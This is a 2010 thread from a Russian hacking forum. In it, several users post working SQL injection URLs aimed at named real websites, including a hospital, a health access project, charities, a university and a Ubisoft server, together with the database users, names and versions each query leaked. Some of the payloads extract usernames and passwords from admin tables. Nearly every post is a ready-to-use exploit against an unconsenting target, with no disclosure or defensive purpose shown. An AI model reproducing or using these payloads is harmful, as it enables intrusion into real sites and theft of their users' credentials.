HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.03.2010, 19:43
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.stnicholashospital.org/providers/provider_info.php?pp=142+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+
User: stnick_cat@localhost
Database: stnick_catalog
Version: 5.0.89-community-log

PR 5.

Код:
http://der-antiaggressionstrainer.com/galerie/view.php?id=2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14--
User: patrik@localhost
Database: galerie
Version: 5.0.45

Код:
http://masfan.com/index.php?component=ecommerce&action=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Красивый сайт с кучей полей.

User: masfanс_masfan@localhost
Database: masfanс_masfan
Version: 5.0.89-community-log

Код:
http://cmx.ubi.com/viewpgn.php?gameid=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())--
Смотрите-ка, что я нашел. За ваши дальнейшие действия не отвечаю... Хотя, таблицы достать нельзя. Не знаю, что вам там в голову придет. Так, запостил для информации.

User: cmxdb@cmt4.web.mdc.ubisoft.com
Database: cmx
Version: 5.0.45-log

Последний раз редактировалось root_sashok; 26.03.2010 в 21:01..
 
Ответить с цитированием

  #2  
Старый 26.03.2010, 22:42
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://dragobarzini.com/query.php?vote=-4+and+1=0+union+select+1,concat(username,char(58), password),3+from+admin

user() : dragobar_votes@localhost

version() : 5.0.89-community-log

database() : dragobar_votes



http://www.tnak.am/sub/opros.php?quest_id=34+and+1=0+union+select+1,2,3

user() : tnakam_hvh13@localhost

version() : 5.0.89-community

database() : tnakam_tnaks
 
Ответить с цитированием

  #3  
Старый 27.03.2010, 01:54
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.mondialisations.org/php/public/liste.php?r=558+union+select+concat_ws(0x3a,user(),database(),version()),2--
Username: mondial@localhost
Database: mondial
Version: 4.1.20

Код:
http://www.stpatricks.org.au/printpage.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
Username: stpats@localhost
Database: stpats
Version: 5.0.32-Debian_7etch5-lo

Title. Есть users.

Код:
http://calendar.templemenorahmiami.org/eventdisplay.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3--
Username: dbo292889623@74.208.16.212
Database: db292889623
Version: 5.0.81-log

Код:
http://swim.wellsreserve.org/stories.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,user(),database(),version()))),6,7,8,9--
Username: srichardson@soy.dreamhost.com
Database: anguilla
Version: 4.1.16-standard-log

Код:
http://www.healthaccessproject.org/vpn_output.php?practice=-1+union+select+unhex(hex(concat_ws(0x3a,user(),database(),version()))),2--
Username: healthaccess@tuna5.xmission.com
Database: healthaccess
Version: 4.1.11-Debian_4sarge8-log

KENT1994, чтобы не терли посты — приводи инъекцию в нормальный вид. После ID дописывай количество колонок. В начале темы написано.

Последний раз редактировалось root_sashok; 27.03.2010 в 03:56..
 
Ответить с цитированием

  #4  
Старый 27.03.2010, 15:08
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://cpod.org.au/page.php?id=-144+union+select+1,2,3,4,5,6,7,8+--+
Version: 5.0.45
User: CBAA@localhost
Database: cbaa
 
Ответить с цитированием

  #5  
Старый 27.03.2010, 15:35
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://mora.am/products.php?category=3+union+select+1,2,3,4,5,6,c oncat(user(),version(),database()),8+from+informat ion_schema.tables

user() : tiensam@localhost

version() : 5.0.89-community

database() : tiensam_mora
 
Ответить с цитированием

  #6  
Старый 27.03.2010, 18:04
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.huntersearch.com.au/entertainment.php?id=-144+union+select+1,2,convert%28version%28%29+using+latin1%29,4+--+
Version: 5.0.16-max-log
User: w2768@localhost
Database: huntersearch_com_au_huntersearch
 
Ответить с цитированием

  #7  
Старый 27.03.2010, 18:38
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

Код:
http://www.drchaiyot.com/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat%28id,0x3a,username,0x3a,password%29,3,4+from+user
Код:
http://www.mondorecords.com/shop.php?id=276+UNION/**/SELECT/**/1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9,10,11/**/LIMIT/**/1,1--
xsqlinjbegin4.0.27-standard
db124719782
dbo124719782@local


Код:
http://www.orchardcentral.com.sg/shop.php?id=-211+UNION+SELECT+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16--
orchard_usr@localhost
orchardcentral_db
5.0.45

Последний раз редактировалось SEWERN; 27.03.2010 в 19:56..
 
Ответить с цитированием

  #8  
Старый 27.03.2010, 19:57
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

китайский PR 5
Код:
http://rjb.bjtu.edu.cn/show.php?id=-1+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9%20--
database: rjbdb
version: 5.0.24a-community-nt
user: root@localhost
 
Ответить с цитированием

  #9  
Старый 27.03.2010, 21:18
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://chelhouse.ru/ipoteka/show_law.php?id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4%20--+
User: 3wuralpress@localhost
Datebase: upi
Version: 5.0.70-log

Код:
http://www.miwatson-electric.ltd.uk/gallery.php?id=1&imgid=-1%20UNION%20SELECT%201,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29%20--+
User: miwatson_www@localhost
Datebase: miwatson_www
Version: 5.0.89-community-log

Код:
http://www.kromestudios.com/games/overview.php?id=-1%20UNION%20SELECT%201,2,3,4,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20%20--+
User: root@localhost
Datebase: logkromeweb2
Version: 5.0.45

Последний раз редактировалось b82a; 27.03.2010 в 21:35..
 
Ответить с цитированием

  #10  
Старый 27.03.2010, 21:36
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.aed.am/program.php?prog=136+and+1=0+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

user() : root@localhost

version() : 5.0.51a-24+lenny3

database() : aed_website

--------------------------------------

есть таблица users

p.s. Так и не нашёл админку...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ